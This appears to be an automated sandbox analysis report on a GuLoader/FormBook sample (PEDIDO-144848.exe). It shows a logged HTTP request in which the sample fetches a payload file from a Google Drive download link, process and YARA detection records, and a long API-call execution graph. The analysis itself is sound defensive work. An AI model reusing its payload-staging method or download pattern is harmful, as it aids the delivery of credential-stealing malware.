                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49749 | 142.251.40.97 | 443 | 7228 | C:\Users\user\Desktop\PEDIDO-144848.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 17:25:58 UTC | 258 | OUT | GET /download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
2024-10-07 17:26:00 UTC | 4885 | IN | HTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="KdFZd217.bin"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 288320
                                                      Last-Modified: Mon, 07 Oct 2024 08:58:50 GMT
                                                      X-GUploader-UploadID: AD-8ljubrGPyjnpmSEv5rEhSo1ej1MB9gNOvN02gHFPKne77PEmTtdqZzEhBjOd90GAHcVYIwzU
                                                      Date: Mon, 07 Oct 2024 17:26:00 GMT
                                                      Expires: Mon, 07 Oct 2024 17:26:00 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=nf9fbA==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close



                                                      Target ID:0
                                                      Start time:13:23:41
                                                      Start date:07/10/2024
                                                      Path:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\PEDIDO-144848.exe"
                                                      Imagebase:0x400000
                                                      File size:614'672 bytes
                                                      MD5 hash:0D9F261233DF472092FBFBB1E982BBE7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.115152353454.0000000002ED8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:13:25:45
                                                      Start date:07/10/2024
                                                      Path:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\PEDIDO-144848.exe"
                                                      Imagebase:0x400000
                                                      File size:614'672 bytes
                                                      MD5 hash:0D9F261233DF472092FBFBB1E982BBE7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.115544134516.00000000017B8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:13:26:33
                                                      Start date:07/10/2024
                                                      Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                      Imagebase:0x140000000
                                                      File size:16'696'840 bytes
                                                      MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:13:26:33
                                                      Start date:07/10/2024
                                                      Path:C:\Windows\SysWOW64\SecEdit.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\SecEdit.exe"
                                                      Imagebase:0x6f0000
                                                      File size:37'888 bytes
                                                      MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:13:29:07
                                                      Start date:07/10/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff6feb50000
                                                      File size:4'849'904 bytes
                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false


                                                        Execution Graph

                                                        Execution Coverage:16.6%
                                                        Dynamic/Decrypted Code Coverage:14.4%
                                                        Signature Coverage:23.2%
                                                        Total number of Nodes:1468
                                                        Total number of Limit Nodes:37
10001534 GlobalSize GlobalAlloc 4533->4598 4534->4532 4536->4521 4543 10002212 4537->4543 4539 10002349 GlobalFree 4540 10001712 4539->4540 4539->4543 4540->4476 4540->4477 4540->4489 4541 100022b9 GlobalAlloc MultiByteToWideChar 4545 10002303 4541->4545 4546 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4541->4546 4542 1000230a lstrlenA 4542->4539 4542->4545 4543->4539 4543->4541 4543->4542 4544 10001224 GlobalAlloc lstrcpynA 4543->4544 4607 100012ad 4543->4607 4544->4543 4545->4539 4611 1000251d 4545->4611 4546->4539 4550 100027fa 4548->4550 4549 1000289f VirtualAllocEx 4551 100028bd 4549->4551 4550->4549 4552 100029b9 4551->4552 4553 100029ae GetLastError 4551->4553 4552->4489 4553->4552 4555 100021c0 4554->4555 4556 1000170b 4554->4556 4555->4556 4557 100021d2 GlobalAlloc 4555->4557 4556->4469 4557->4555 4562 100025a5 4558->4562 4559 100025f6 GlobalAlloc 4563 10002618 4559->4563 4560 10002609 4561 1000260e GlobalSize 4560->4561 4560->4563 4561->4563 4562->4559 4562->4560 4563->4494 4565 10002aae 4564->4565 4566 10002aee GlobalFree 4565->4566 4614 10001215 GlobalAlloc 4567->4614 4569 1000243a lstrcpynA 4575 100023e6 4569->4575 4570 1000244b StringFromGUID2 WideCharToMultiByte 4570->4575 4571 1000246f WideCharToMultiByte 4571->4575 4572 10002490 wsprintfA 4572->4575 4573 100024b4 GlobalFree 4573->4575 4574 100024ee GlobalFree 4574->4482 4575->4569 4575->4570 4575->4571 4575->4572 4575->4573 4575->4574 4576 10001266 2 API calls 4575->4576 4615 100012d1 4575->4615 4576->4575 4619 10001215 GlobalAlloc 4578->4619 4580 1000155f 4582 10001586 4580->4582 4583 1000156c lstrcpyA 4580->4583 4584 100015a0 4582->4584 4585 1000158b wsprintfA 4582->4585 4583->4584 4586 10001266 4584->4586 4585->4584 4587 100012a8 GlobalFree 4586->4587 4588 1000126f GlobalAlloc lstrcpynA 4586->4588 4587->4492 4588->4587 4590 100017c5 4589->4590 4591 100023ae 4589->4591 4590->4502 4590->4503 4591->4590 4592 100023c7 GlobalFree 4591->4592 4592->4591 4594 10001266 2 API calls 4593->4594 4595 
10001503 4594->4595 4595->4496 4596->4507 4597->4532 4599 10001552 4598->4599 4599->4533 4606 10001215 GlobalAlloc 4600->4606 4602 10001233 lstrcpynA 4602->4525 4603->4532 4604->4526 4605->4531 4606->4602 4608 100012b4 4607->4608 4609 10001224 2 API calls 4608->4609 4610 100012cf 4609->4610 4610->4543 4612 10002581 4611->4612 4613 1000252b VirtualAlloc 4611->4613 4612->4545 4613->4612 4614->4575 4616 100012f9 4615->4616 4617 100012da 4615->4617 4616->4575 4617->4616 4618 100012e0 lstrcpyA 4617->4618 4618->4616 4619->4580 3753 403180 SetErrorMode GetVersion 3754 4031b7 3753->3754 3755 4031bd 3753->3755 3756 406139 5 API calls 3754->3756 3841 4060cb GetSystemDirectoryA 3755->3841 3756->3755 3758 4031d3 lstrlenA 3758->3755 3759 4031e2 3758->3759 3844 406139 GetModuleHandleA 3759->3844 3762 406139 5 API calls 3763 4031f1 #17 OleInitialize SHGetFileInfoA 3762->3763 3850 405da0 lstrcpynA 3763->3850 3765 40322e GetCommandLineA 3851 405da0 lstrcpynA 3765->3851 3767 403240 GetModuleHandleA 3768 403257 3767->3768 3852 40583d 3768->3852 3771 403345 3772 403358 GetTempPathA 3771->3772 3856 40314f 3772->3856 3774 403370 3775 403374 GetWindowsDirectoryA lstrcatA 3774->3775 3776 4033ca DeleteFileA 3774->3776 3778 40314f 12 API calls 3775->3778 3866 402cfa GetTickCount GetModuleFileNameA 3776->3866 3777 40583d CharNextA 3779 40327b 3777->3779 3781 403390 3778->3781 3779->3771 3779->3777 3782 403347 3779->3782 3781->3776 3784 403394 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3781->3784 3951 405da0 lstrcpynA 3782->3951 3783 4033de 3790 40583d CharNextA 3783->3790 3823 403464 3783->3823 3836 403474 3783->3836 3786 40314f 12 API calls 3784->3786 3788 4033c2 3786->3788 3788->3776 3788->3836 3792 4033f9 3790->3792 3800 4034a4 3792->3800 3801 40343f 3792->3801 3793 4035ac 3796 4035b4 GetCurrentProcess OpenProcessToken 3793->3796 3797 40362e ExitProcess 3793->3797 3794 40348e 3975 405596 3794->3975 3802 4035ff 3796->3802 3803 4035cf LookupPrivilegeValueA 
AdjustTokenPrivileges 3796->3803 3979 405519 3800->3979 3952 405900 3801->3952 3806 406139 5 API calls 3802->3806 3803->3802 3809 403606 3806->3809 3812 40361b ExitWindowsEx 3809->3812 3815 403627 3809->3815 3810 4034c5 lstrcatA lstrcmpiA 3814 4034e1 3810->3814 3810->3836 3811 4034ba lstrcatA 3811->3810 3812->3797 3812->3815 3817 4034e6 3814->3817 3818 4034ed 3814->3818 4017 40140b 3815->4017 3816 403459 3967 405da0 lstrcpynA 3816->3967 3982 40547f CreateDirectoryA 3817->3982 3987 4054fc CreateDirectoryA 3818->3987 3894 403720 3823->3894 3825 4034f2 SetCurrentDirectoryA 3826 403501 3825->3826 3827 40350c 3825->3827 3990 405da0 lstrcpynA 3826->3990 3991 405da0 lstrcpynA 3827->3991 3832 403558 CopyFileA 3838 40351a 3832->3838 3833 4035a0 3834 405c5b 38 API calls 3833->3834 3834->3836 3968 403646 3836->3968 3837 405dc2 18 API calls 3837->3838 3838->3833 3838->3837 3840 40358c CloseHandle 3838->3840 3992 405dc2 3838->3992 4010 405c5b MoveFileExA 3838->4010 4014 405531 CreateProcessA 3838->4014 3840->3838 3843 4060ed wsprintfA LoadLibraryExA 3841->3843 3843->3758 3845 406155 3844->3845 3846 40615f GetProcAddress 3844->3846 3847 4060cb 3 API calls 3845->3847 3848 4031ea 3846->3848 3849 40615b 3847->3849 3848->3762 3849->3846 3849->3848 3850->3765 3851->3767 3853 405843 3852->3853 3854 40326b CharNextA 3853->3854 3855 405849 CharNextA 3853->3855 3854->3779 3855->3853 4020 40600b 3856->4020 3858 403165 3858->3774 3859 40315b 3859->3858 4029 405812 lstrlenA CharPrevA 3859->4029 3862 4054fc 2 API calls 3863 403173 3862->3863 4032 405a42 3863->4032 4036 405a13 GetFileAttributesA CreateFileA 3866->4036 3868 402d3a 3869 402d4a 3868->3869 4037 405da0 lstrcpynA 3868->4037 3869->3783 3871 402d60 4038 405859 lstrlenA 3871->4038 3875 402d71 GetFileSize 3876 402d88 3875->3876 3891 402e6d 3875->3891 3876->3869 3881 402ed9 3876->3881 3889 402c96 6 API calls 3876->3889 3876->3891 4075 403122 3876->4075 3878 402e76 3878->3869 3880 402ea6 GlobalAlloc 3878->3880 4078 403138 SetFilePointer 
3878->4078 4054 403138 SetFilePointer 3880->4054 3885 402c96 6 API calls 3881->3885 3884 402ec1 4055 402f33 3884->4055 3885->3869 3886 402e8f 3888 403122 ReadFile 3886->3888 3890 402e9a 3888->3890 3889->3876 3890->3869 3890->3880 4043 402c96 3891->4043 3892 402ecd 3892->3869 3892->3892 3893 402f0a SetFilePointer 3892->3893 3893->3869 3895 406139 5 API calls 3894->3895 3896 403734 3895->3896 3897 40373a 3896->3897 3898 40374c 3896->3898 4108 405cfe wsprintfA 3897->4108 4109 405c87 RegOpenKeyExA 3898->4109 3901 403795 lstrcatA 3904 40374a 3901->3904 3903 405c87 3 API calls 3903->3901 4099 4039e5 3904->4099 3907 405900 18 API calls 3908 4037c7 3907->3908 3909 403850 3908->3909 3911 405c87 3 API calls 3908->3911 3910 405900 18 API calls 3909->3910 3912 403856 3910->3912 3913 4037f3 3911->3913 3914 403866 LoadImageA 3912->3914 3915 405dc2 18 API calls 3912->3915 3913->3909 3920 40380f lstrlenA 3913->3920 3921 40583d CharNextA 3913->3921 3916 40390c 3914->3916 3917 40388d RegisterClassA 3914->3917 3915->3914 3919 40140b 2 API calls 3916->3919 3918 4038c3 SystemParametersInfoA CreateWindowExA 3917->3918 3950 403916 3917->3950 3918->3916 3924 403912 3919->3924 3922 403843 3920->3922 3923 40381d lstrcmpiA 3920->3923 3925 40380d 3921->3925 3927 405812 3 API calls 3922->3927 3923->3922 3926 40382d GetFileAttributesA 3923->3926 3929 4039e5 19 API calls 3924->3929 3924->3950 3925->3920 3928 403839 3926->3928 3930 403849 3927->3930 3928->3922 3931 405859 2 API calls 3928->3931 3932 403923 3929->3932 4114 405da0 lstrcpynA 3930->4114 3931->3922 3934 4039b2 3932->3934 3935 40392f ShowWindow 3932->3935 4115 40508b OleInitialize 3934->4115 3937 4060cb 3 API calls 3935->3937 3939 403947 3937->3939 3938 4039b8 3940 4039d4 3938->3940 3941 4039bc 3938->3941 3942 403955 GetClassInfoA 3939->3942 3946 4060cb 3 API calls 3939->3946 3945 40140b 2 API calls 3940->3945 3948 40140b 2 API calls 3941->3948 3941->3950 3943 403969 GetClassInfoA RegisterClassA 3942->3943 3944 40397f DialogBoxParamA 
3942->3944 3943->3944 3947 40140b 2 API calls 3944->3947 3945->3950 3946->3942 3949 4039a7 3947->3949 3948->3950 3949->3950 3950->3836 3951->3772 4130 405da0 lstrcpynA 3952->4130 3954 405911 4131 4058ab CharNextA CharNextA 3954->4131 3957 40344a 3957->3836 3966 405da0 lstrcpynA 3957->3966 3958 40600b 5 API calls 3964 405927 3958->3964 3959 405952 lstrlenA 3960 40595d 3959->3960 3959->3964 3961 405812 3 API calls 3960->3961 3963 405962 GetFileAttributesA 3961->3963 3963->3957 3964->3957 3964->3959 3965 405859 2 API calls 3964->3965 4137 4060a4 FindFirstFileA 3964->4137 3965->3959 3966->3816 3967->3823 3969 403650 CloseHandle 3968->3969 3970 40365e 3968->3970 3969->3970 4140 40368b 3970->4140 3976 4055ab 3975->3976 3977 40349c ExitProcess 3976->3977 3978 4055bf MessageBoxIndirectA 3976->3978 3978->3977 3980 406139 5 API calls 3979->3980 3981 4034a9 lstrcatA 3980->3981 3981->3810 3981->3811 3983 4054d0 GetLastError 3982->3983 3984 4034eb 3982->3984 3983->3984 3985 4054df SetFileSecurityA 3983->3985 3984->3825 3985->3984 3986 4054f5 GetLastError 3985->3986 3986->3984 3988 405510 GetLastError 3987->3988 3989 40550c 3987->3989 3988->3989 3989->3825 3990->3827 3991->3838 3993 405dcf 3992->3993 3994 405ff2 3993->3994 3997 405e70 GetVersion 3993->3997 3998 405fc9 lstrlenA 3993->3998 4001 405dc2 10 API calls 3993->4001 4002 405ee8 GetSystemDirectoryA 3993->4002 4003 405c87 3 API calls 3993->4003 4004 405efb GetWindowsDirectoryA 3993->4004 4005 40600b 5 API calls 3993->4005 4006 405f2f SHGetSpecialFolderLocation 3993->4006 4007 405dc2 10 API calls 3993->4007 4008 405f72 lstrcatA 3993->4008 4197 405cfe wsprintfA 3993->4197 4198 405da0 lstrcpynA 3993->4198 3995 40354b DeleteFileA 3994->3995 4199 405da0 lstrcpynA 3994->4199 3995->3832 3995->3838 3997->3993 3998->3993 4001->3998 4002->3993 4003->3993 4004->3993 4005->3993 4006->3993 4009 405f47 SHGetPathFromIDListA CoTaskMemFree 4006->4009 4007->3993 4008->3993 4009->3993 4011 405c7c 4010->4011 4012 405c6f 4010->4012 4011->3838 
4200 405ae9 lstrcpyA 4012->4200 4015 405570 4014->4015 4016 405564 CloseHandle 4014->4016 4015->3838 4016->4015 4018 401389 2 API calls 4017->4018 4019 401420 4018->4019 4019->3797 4026 406017 4020->4026 4021 406083 CharPrevA 4022 40607f 4021->4022 4022->4021 4025 40609e 4022->4025 4023 406074 CharNextA 4023->4022 4023->4026 4024 40583d CharNextA 4024->4026 4025->3859 4026->4022 4026->4023 4026->4024 4027 406062 CharNextA 4026->4027 4028 40606f CharNextA 4026->4028 4027->4026 4028->4023 4030 40316d 4029->4030 4031 40582c lstrcatA 4029->4031 4030->3862 4031->4030 4033 405a4d GetTickCount GetTempFileNameA 4032->4033 4034 40317e 4033->4034 4035 405a7a 4033->4035 4034->3774 4035->4033 4035->4034 4036->3868 4037->3871 4039 405866 4038->4039 4040 402d66 4039->4040 4041 40586b CharPrevA 4039->4041 4042 405da0 lstrcpynA 4040->4042 4041->4039 4041->4040 4042->3875 4044 402cb7 4043->4044 4045 402c9f 4043->4045 4048 402cc7 GetTickCount 4044->4048 4049 402cbf 4044->4049 4046 402ca8 DestroyWindow 4045->4046 4047 402caf 4045->4047 4046->4047 4047->3878 4051 402cd5 CreateDialogParamA ShowWindow 4048->4051 4052 402cf8 4048->4052 4079 406175 4049->4079 4051->4052 4052->3878 4054->3884 4056 402f49 4055->4056 4057 402f77 4056->4057 4085 403138 SetFilePointer 4056->4085 4059 403122 ReadFile 4057->4059 4060 402f82 4059->4060 4061 402f94 GetTickCount 4060->4061 4062 4030bb 4060->4062 4064 4030a5 4060->4064 4061->4064 4071 402fc0 4061->4071 4063 4030fd 4062->4063 4068 4030bf 4062->4068 4066 403122 ReadFile 4063->4066 4064->3892 4065 403122 ReadFile 4065->4071 4066->4064 4067 403122 ReadFile 4067->4068 4068->4064 4068->4067 4069 405aba WriteFile 4068->4069 4069->4068 4070 403016 GetTickCount 4070->4071 4071->4064 4071->4065 4071->4070 4072 40303b MulDiv wsprintfA 4071->4072 4083 405aba WriteFile 4071->4083 4086 404fb9 4072->4086 4097 405a8b ReadFile 4075->4097 4078->3886 4080 406192 PeekMessageA 4079->4080 4081 402cc5 4080->4081 4082 406188 DispatchMessageA 4080->4082 4081->3878 
4082->4080 4084 405ad8 4083->4084 4084->4071 4085->4057 4087 404fd4 4086->4087 4096 405077 4086->4096 4088 404ff1 lstrlenA 4087->4088 4089 405dc2 18 API calls 4087->4089 4090 40501a 4088->4090 4091 404fff lstrlenA 4088->4091 4089->4088 4093 405020 SetWindowTextA 4090->4093 4094 40502d 4090->4094 4092 405011 lstrcatA 4091->4092 4091->4096 4092->4090 4093->4094 4095 405033 SendMessageA SendMessageA SendMessageA 4094->4095 4094->4096 4095->4096 4096->4071 4098 403135 4097->4098 4098->3876 4100 4039f9 4099->4100 4122 405cfe wsprintfA 4100->4122 4102 403a6a 4103 405dc2 18 API calls 4102->4103 4104 403a76 SetWindowTextA 4103->4104 4105 403a92 4104->4105 4106 4037a5 4104->4106 4105->4106 4107 405dc2 18 API calls 4105->4107 4106->3907 4107->4105 4108->3904 4110 403777 4109->4110 4111 405cba RegQueryValueExA 4109->4111 4110->3901 4110->3903 4112 405cdb RegCloseKey 4111->4112 4112->4110 4114->3909 4123 403fd1 4115->4123 4117 4050ae 4121 4050d5 4117->4121 4126 401389 4117->4126 4118 403fd1 SendMessageA 4119 4050e7 OleUninitialize 4118->4119 4119->3938 4121->4118 4122->4102 4124 403fe9 4123->4124 4125 403fda SendMessageA 4123->4125 4124->4117 4125->4124 4128 401390 4126->4128 4127 4013fe 4127->4117 4128->4127 4129 4013cb MulDiv SendMessageA 4128->4129 4129->4128 4130->3954 4132 4058d6 4131->4132 4133 4058c6 4131->4133 4135 40583d CharNextA 4132->4135 4136 4058f6 4132->4136 4133->4132 4134 4058d1 CharNextA 4133->4134 4134->4136 4135->4132 4136->3957 4136->3958 4138 4060c5 4137->4138 4139 4060ba FindClose 4137->4139 4138->3964 4139->4138 4142 403699 4140->4142 4141 403663 4144 405642 4141->4144 4142->4141 4143 40369e FreeLibrary GlobalFree 4142->4143 4143->4141 4143->4143 4145 405900 18 API calls 4144->4145 4146 405662 4145->4146 4147 405681 4146->4147 4148 40566a DeleteFileA 4146->4148 4150 4057b9 4147->4150 4184 405da0 lstrcpynA 4147->4184 4149 40347d OleUninitialize 4148->4149 4149->3793 4149->3794 4150->4149 4155 4060a4 2 API calls 4150->4155 4152 4056a7 4153 4056ba 
4152->4153 4154 4056ad lstrcatA 4152->4154 4157 405859 2 API calls 4153->4157 4156 4056c0 4154->4156 4158 4057d3 4155->4158 4159 4056ce lstrcatA 4156->4159 4161 4056d9 lstrlenA FindFirstFileA 4156->4161 4157->4156 4158->4149 4160 4057d7 4158->4160 4159->4161 4162 405812 3 API calls 4160->4162 4163 4057af 4161->4163 4182 4056fd 4161->4182 4164 4057dd 4162->4164 4163->4150 4166 4055fa 5 API calls 4164->4166 4165 40583d CharNextA 4165->4182 4167 4057e9 4166->4167 4168 405803 4167->4168 4169 4057ed 4167->4169 4172 404fb9 25 API calls 4168->4172 4169->4149 4174 404fb9 25 API calls 4169->4174 4170 40578e FindNextFileA 4173 4057a6 FindClose 4170->4173 4170->4182 4172->4149 4173->4163 4175 4057fa 4174->4175 4176 405c5b 38 API calls 4175->4176 4179 405801 4176->4179 4178 405642 62 API calls 4178->4182 4179->4149 4180 404fb9 25 API calls 4180->4170 4181 404fb9 25 API calls 4181->4182 4182->4165 4182->4170 4182->4178 4182->4180 4182->4181 4183 405c5b 38 API calls 4182->4183 4185 405da0 lstrcpynA 4182->4185 4186 4055fa 4182->4186 4183->4182 4184->4152 4185->4182 4194 4059ee GetFileAttributesA 4186->4194 4189 405615 RemoveDirectoryA 4191 405623 4189->4191 4190 40561d DeleteFileA 4190->4191 4192 405627 4191->4192 4193 405633 SetFileAttributesA 4191->4193 4192->4182 4193->4192 4195 405a00 SetFileAttributesA 4194->4195 4196 405606 4194->4196 4195->4196 4196->4189 4196->4190 4196->4192 4197->3993 4198->3993 4199->3995 4201 405b11 4200->4201 4202 405b37 GetShortPathNameA 4200->4202 4227 405a13 GetFileAttributesA CreateFileA 4201->4227 4203 405c56 4202->4203 4204 405b4c 4202->4204 4203->4011 4204->4203 4206 405b54 wsprintfA 4204->4206 4208 405dc2 18 API calls 4206->4208 4207 405b1b CloseHandle GetShortPathNameA 4207->4203 4209 405b2f 4207->4209 4210 405b7c 4208->4210 4209->4202 4209->4203 4228 405a13 GetFileAttributesA CreateFileA 4210->4228 4212 405b89 4212->4203 4213 405b98 GetFileSize GlobalAlloc 4212->4213 4214 405bba 4213->4214 4215 405c4f CloseHandle 4213->4215 4216 405a8b 
ReadFile 4214->4216 4215->4203 4217 405bc2 4216->4217 4217->4215 4229 405978 lstrlenA 4217->4229 4220 405bd9 lstrcpyA 4223 405bfb 4220->4223 4221 405bed 4222 405978 4 API calls 4221->4222 4222->4223 4224 405c32 SetFilePointer 4223->4224 4225 405aba WriteFile 4224->4225 4226 405c48 GlobalFree 4225->4226 4226->4215 4227->4207 4228->4212 4230 4059b9 lstrlenA 4229->4230 4231 405992 lstrcmpiA 4230->4231 4233 4059c1 4230->4233 4232 4059b0 CharNextA 4231->4232 4231->4233 4232->4230 4233->4220 4233->4221 5083 401000 5084 401037 BeginPaint GetClientRect 5083->5084 5085 40100c DefWindowProcA 5083->5085 5087 4010f3 5084->5087 5088 401179 5085->5088 5089 401073 CreateBrushIndirect FillRect DeleteObject 5087->5089 5090 4010fc 5087->5090 5089->5087 5091 401102 CreateFontIndirectA 5090->5091 5092 401167 EndPaint 5090->5092 5091->5092 5093 401112 6 API calls 5091->5093 5092->5088 5093->5092 5094 401900 5095 402ace 18 API calls 5094->5095 5096 401907 5095->5096 5097 405596 MessageBoxIndirectA 5096->5097 5098 401910 5097->5098 5099 401502 5100 40150a 5099->5100 5102 40151d 5099->5102 5101 402aac 18 API calls 5100->5101 5101->5102 4234 402483 4245 402bd8 4234->4245 4236 40248d 4249 402ace 4236->4249 4239 4024a0 RegQueryValueExA 4241 4024c0 4239->4241 4242 4024c6 RegCloseKey 4239->4242 4240 402729 4241->4242 4255 405cfe wsprintfA 4241->4255 4242->4240 4246 402ace 18 API calls 4245->4246 4247 402bf1 4246->4247 4248 402bff RegOpenKeyExA 4247->4248 4248->4236 4250 402ada 4249->4250 4251 405dc2 18 API calls 4250->4251 4252 402afb 4251->4252 4253 402496 4252->4253 4254 40600b 5 API calls 4252->4254 4253->4239 4253->4240 4254->4253 4255->4242 5103 100029c3 5104 100029db 5103->5104 5105 10001534 2 API calls 5104->5105 5106 100029f6 5105->5106 5107 401c04 5108 402aac 18 API calls 5107->5108 5109 401c0b 5108->5109 5110 402aac 18 API calls 5109->5110 5111 401c18 5110->5111 5112 401c2d 5111->5112 5113 402ace 18 API calls 5111->5113 5114 401c3d 5112->5114 5115 402ace 18 API calls 5112->5115 
